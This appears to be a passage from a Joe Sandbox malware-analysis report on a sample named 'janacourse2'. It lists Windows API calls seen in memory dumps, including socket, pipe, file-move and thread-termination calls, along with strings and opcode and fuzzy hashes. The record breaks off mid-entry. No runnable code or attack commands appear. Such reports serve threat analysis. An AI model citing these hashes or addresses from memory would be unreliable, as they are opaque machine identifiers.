                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                            • String ID:
                                                                                                            • API String ID: 87235514-0
                                                                                                            • Opcode ID: 039ac5a131498e9e7a40896ac07014e6a4d2b6f5ab3b8b41f2be0b40ec07ea16
                                                                                                            • Instruction ID: 99d91cfcc7b44c6ef6283dbc57b2f6aa96953c0d1b194b4c6d40848e2ac7199a
                                                                                                            • Opcode Fuzzy Hash: 039ac5a131498e9e7a40896ac07014e6a4d2b6f5ab3b8b41f2be0b40ec07ea16
                                                                                                            • Instruction Fuzzy Hash: C451E6A17067D57EFB3392388C95BBA7EE85B46304F0884C8E1D6474C7C2ACE898D760
                                                                                                            APIs
                                                                                                            • GetConsoleCP.KERNEL32(00FF3CD6,?,?,?,?,?,?,?,?,00FE5BA3,?,?,00FF3CD6,?,?), ref: 00FE5470
                                                                                                            • __fassign.LIBCMT ref: 00FE54EB
                                                                                                            • __fassign.LIBCMT ref: 00FE5506
                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00FF3CD6,00000005,00000000,00000000), ref: 00FE552C
                                                                                                            • WriteFile.KERNEL32(?,00FF3CD6,00000000,00FE5BA3,00000000,?,?,?,?,?,?,?,?,?,00FE5BA3,?), ref: 00FE554B
                                                                                                            • WriteFile.KERNEL32(?,?,00000001,00FE5BA3,00000000,?,?,?,?,?,?,?,?,?,00FE5BA3,?), ref: 00FE5584
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                            • String ID:
                                                                                                            • API String ID: 1324828854-0
                                                                                                            • Opcode ID: 64d65abc6fc38b212ee8576d5a3b2355a05f11addaac1f101065d479b2f3d714
                                                                                                            • Instruction ID: 87750800e593e6ea42c5f75c979658d7f83324735488147074fd5150cc1ddbcb
                                                                                                            • Opcode Fuzzy Hash: 64d65abc6fc38b212ee8576d5a3b2355a05f11addaac1f101065d479b2f3d714
                                                                                                            • Instruction Fuzzy Hash: 0251F4B1E007899FDB10CFA9D885AEEBBF9EF09714F18401AF955E7291D7309A40CB61
                                                                                                            APIs
                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00FD2D4B
                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00FD2D53
                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00FD2DE1
                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00FD2E0C
                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00FD2E61
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                            • String ID: csm
                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                            • Opcode ID: 811ead290f6ca6e25e7ab806dd53471c821e59ea5a97166d6f1da7c9be1d91d1
                                                                                                            • Instruction ID: f4f419129e76a745e7193962e0fa2c70289b89ed1623df99a0da5806d9ff5a3e
                                                                                                            • Opcode Fuzzy Hash: 811ead290f6ca6e25e7ab806dd53471c821e59ea5a97166d6f1da7c9be1d91d1
                                                                                                            • Instruction Fuzzy Hash: 6D41D235E00209ABCF10DF68CC85A9EBBB7BF54324F188156F9146B352D7369A01EBD1
                                                                                                            APIs
                                                                                                              • Part of subcall function 0103304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0103307A
                                                                                                              • Part of subcall function 0103304E: _wcslen.LIBCMT ref: 0103309B
                                                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 01031112
                                                                                                            • WSAGetLastError.WSOCK32 ref: 01031121
                                                                                                            • WSAGetLastError.WSOCK32 ref: 010311C9
                                                                                                            • closesocket.WSOCK32(00000000), ref: 010311F9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 2675159561-0
                                                                                                            • Opcode ID: 7cde7b6ac8633170911b9ccbe3567097361c889f1e9b0f01fcc607236720d319
                                                                                                            • Instruction ID: 852b0721eb4c9df7a78454de07223be2b961de69cd1adda68514094cdcb42d6a
                                                                                                            • Opcode Fuzzy Hash: 7cde7b6ac8633170911b9ccbe3567097361c889f1e9b0f01fcc607236720d319
                                                                                                            • Instruction Fuzzy Hash: 4B41D9756001049FE7109F14C984BEAB7EDFF85364F048099FC959B285C775AD41CBE1
                                                                                                            APIs
                                                                                                              • Part of subcall function 0101DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0101CF22,?), ref: 0101DDFD
                                                                                                              • Part of subcall function 0101DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0101CF22,?), ref: 0101DE16
                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0101CF45
                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0101CF7F
                                                                                                            • _wcslen.LIBCMT ref: 0101D005
                                                                                                            • _wcslen.LIBCMT ref: 0101D01B
                                                                                                            • SHFileOperationW.SHELL32(?), ref: 0101D061
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                            • String ID: \*.*
                                                                                                            • API String ID: 3164238972-1173974218
                                                                                                            • Opcode ID: 93956bb84ef5e3fa23ff9a21a98895d10f35f6af72de827daedb3f7700ad6047
                                                                                                            • Instruction ID: bf90a73e4dddbc2d07c81562cd00f78fea401f18f8ce394ea67085a2c44229d3
                                                                                                            • Opcode Fuzzy Hash: 93956bb84ef5e3fa23ff9a21a98895d10f35f6af72de827daedb3f7700ad6047
                                                                                                            • Instruction Fuzzy Hash: 754158719451195FEF52EFA4CE81ADD77F8AF08380F0400EAD549EB145EB39E644CB50
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 01042E1C
                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 01042E4F
                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 01042E84
                                                                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 01042EB6
                                                                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 01042EE0
                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 01042EF1
                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 01042F0B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LongWindow$MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 2178440468-0
                                                                                                            • Opcode ID: 45676e78c04450f6f6a4d4217427411d6f5b28d6a897a14f045754ae194806ae
                                                                                                            • Instruction ID: 320ea6dc2e74fc20058ff8168729c98e1f3c40bd74e4faf057fe88361234f151
                                                                                                            • Opcode Fuzzy Hash: 45676e78c04450f6f6a4d4217427411d6f5b28d6a897a14f045754ae194806ae
                                                                                                            • Instruction Fuzzy Hash: D33114B4705140AFEB31CF59EDC4F6937E0EB4A710F1501A4FAD48B2A6CB76A841DB40
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01017769
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0101778F
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 01017792
                                                                                                            • SysAllocString.OLEAUT32(?), ref: 010177B0
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 010177B9
                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 010177DE
                                                                                                            • SysAllocString.OLEAUT32(?), ref: 010177EC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                            • String ID:
                                                                                                            • API String ID: 3761583154-0
                                                                                                            • Opcode ID: 9065af514eb8c5298676292251f63d5299cf9f890ba72295f432bae1262d4fe1
                                                                                                            • Instruction ID: 7c74563e06a2289fe3c83db1da9f979c8a893b40b7086a8608178a55c058d577
                                                                                                            • Opcode Fuzzy Hash: 9065af514eb8c5298676292251f63d5299cf9f890ba72295f432bae1262d4fe1
                                                                                                            • Instruction Fuzzy Hash: 6B21F47A600209AFEF10EEACCE88DBB77ECFB09360B008065FA55CB155DA78DC418760
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01017842
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01017868
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 0101786B
                                                                                                            • SysAllocString.OLEAUT32 ref: 0101788C
                                                                                                            • SysFreeString.OLEAUT32 ref: 01017895
                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 010178AF
                                                                                                            • SysAllocString.OLEAUT32(?), ref: 010178BD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                            • String ID:
                                                                                                            • API String ID: 3761583154-0
                                                                                                            • Opcode ID: 434ab9b46e42416c8a81575e74388d6d9c07e131c0b3cb281ab65f6e1ff66f4d
                                                                                                            • Instruction ID: e45170af0632a4299dbba1e6259ebc1a1ee6f489e6c41fe15c492e331c763ed7
                                                                                                            • Opcode Fuzzy Hash: 434ab9b46e42416c8a81575e74388d6d9c07e131c0b3cb281ab65f6e1ff66f4d
                                                                                                            • Instruction Fuzzy Hash: 4B21D375600204AFEB10AFBCCD88DBA77ECEB093607108025F955CB2A9DA78DC41CB74
                                                                                                            APIs
                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 010205C6
                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01020601
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateHandlePipe
                                                                                                            • String ID: nul
                                                                                                            • API String ID: 1424370930-2873401336
                                                                                                            • Opcode ID: 9e51155dcfdc4b220d6c0ef6a704bee9f058238131a24a50367285645aa7ac36
                                                                                                            • Instruction ID: f278eca44fc3b19ac8a3e391566578a5deb120ff713a81c6d59821a442cc63ab
                                                                                                            • Opcode Fuzzy Hash: 9e51155dcfdc4b220d6c0ef6a704bee9f058238131a24a50367285645aa7ac36
                                                                                                            • Instruction Fuzzy Hash: 2921B7755003259FEB309F6DC948A9AB7E8BF89724F300A59F9E1D72E8D7B19540CB10
                                                                                                            APIs
                                                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 010204F2
                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0102052E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateHandlePipe
                                                                                                            • String ID: nul
                                                                                                            • API String ID: 1424370930-2873401336
                                                                                                            • Opcode ID: 97e235d0a4ead5be97bac1447cfa1fd0c149858191ddce85ec865082bd051e48
                                                                                                            • Instruction ID: 498becabaaf189deb0e0af3163bc2a1cf922b1dad7de975c61cfcae5dfeefa8d
                                                                                                            • Opcode Fuzzy Hash: 97e235d0a4ead5be97bac1447cfa1fd0c149858191ddce85ec865082bd051e48
                                                                                                            • Instruction Fuzzy Hash: 3E21BFB4600329EFEB208F29D944A9BBBF4AF44720F204A58F9E1D72E8D7709540CB60
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00FB604C
                                                                                                              • Part of subcall function 00FB600E: GetStockObject.GDI32(00000011), ref: 00FB6060
                                                                                                              • Part of subcall function 00FB600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FB606A
                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 01044112
                                                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0104411F
                                                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0104412A
                                                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 01044139
                                                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01044145
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                                                            • String ID: Msctls_Progress32
                                                                                                            • API String ID: 1025951953-3636473452
                                                                                                            • Opcode ID: 8831fe2b7316dd7f6e6645f9fe543fd11f41fa11ffacec137addd7eef1b31406
                                                                                                            • Instruction ID: a145b7533c54ec7d5d7c9247f6e6ecfc236db080dc8adfe2ac8a27c918c4920b
                                                                                                            • Opcode Fuzzy Hash: 8831fe2b7316dd7f6e6645f9fe543fd11f41fa11ffacec137addd7eef1b31406
                                                                                                            • Instruction Fuzzy Hash: 5711B2B215021DBFFF219E65CC85EEB7F9DEF08798F018121BA58E6050C6769C21DBA4
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FED7A3: _free.LIBCMT ref: 00FED7CC
                                                                                                            • _free.LIBCMT ref: 00FED82D
                                                                                                              • Part of subcall function 00FE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00FED7D1,00000000,00000000,00000000,00000000,?,00FED7F8,00000000,00000007,00000000,?,00FEDBF5,00000000), ref: 00FE29DE
                                                                                                              • Part of subcall function 00FE29C8: GetLastError.KERNEL32(00000000,?,00FED7D1,00000000,00000000,00000000,00000000,?,00FED7F8,00000000,00000007,00000000,?,00FEDBF5,00000000,00000000), ref: 00FE29F0
                                                                                                            • _free.LIBCMT ref: 00FED838
                                                                                                            • _free.LIBCMT ref: 00FED843
                                                                                                            • _free.LIBCMT ref: 00FED897
                                                                                                            • _free.LIBCMT ref: 00FED8A2
                                                                                                            • _free.LIBCMT ref: 00FED8AD
                                                                                                            • _free.LIBCMT ref: 00FED8B8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                            • Instruction ID: d6632e52926183d9b920c9900ebd21d0d8d55cbfbc91fd1fa1c4db14a1be4434
                                                                                                            • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                            • Instruction Fuzzy Hash: 01115171540B88AAD521BFB2CC47FCB7BEC6F00700F400825B699A6893DA6DB5057651
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0101DA74
                                                                                                            • LoadStringW.USER32(00000000), ref: 0101DA7B
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0101DA91
                                                                                                            • LoadStringW.USER32(00000000), ref: 0101DA98
                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0101DADC
                                                                                                            Strings
                                                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 0101DAB9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleLoadModuleString$Message
                                                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                                                            • API String ID: 4072794657-3128320259
                                                                                                            • Opcode ID: 4bad4bec1c95d3a89e666bc70d73ac6664d8b031c5721e537a106e6ee21eab7b
                                                                                                            • Instruction ID: e70fb2cef8cdf819356c3bb68330ce9cd91c5bd45bc73d132d7bb0cf352de3a4
                                                                                                            • Opcode Fuzzy Hash: 4bad4bec1c95d3a89e666bc70d73ac6664d8b031c5721e537a106e6ee21eab7b
                                                                                                            • Instruction Fuzzy Hash: 630162F69002087FF710DBE49FC9EEB376CE708205F404495B786E2045EA79AE844B74
                                                                                                            APIs
                                                                                                            • InterlockedExchange.KERNEL32(0117BA98,0117BA98), ref: 0102097B
                                                                                                            • EnterCriticalSection.KERNEL32(0117BA78,00000000), ref: 0102098D
                                                                                                            • TerminateThread.KERNEL32(011724A8,000001F6), ref: 0102099B
                                                                                                            • WaitForSingleObject.KERNEL32(011724A8,000003E8), ref: 010209A9
                                                                                                            • CloseHandle.KERNEL32(011724A8), ref: 010209B8
                                                                                                            • InterlockedExchange.KERNEL32(0117BA98,000001F6), ref: 010209C8
                                                                                                            • LeaveCriticalSection.KERNEL32(0117BA78), ref: 010209CF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 3495660284-0
                                                                                                            • Opcode ID: e63dd1efb1bcb47dff1a29c9cb463de81d1616b16e0ee74dbef4131b781ff3c7
                                                                                                            • Instruction ID: 19ecaa60ef02c6d75ebc86adce9c0f4603a59a151cdb87e7ffbb69a08a81a50f
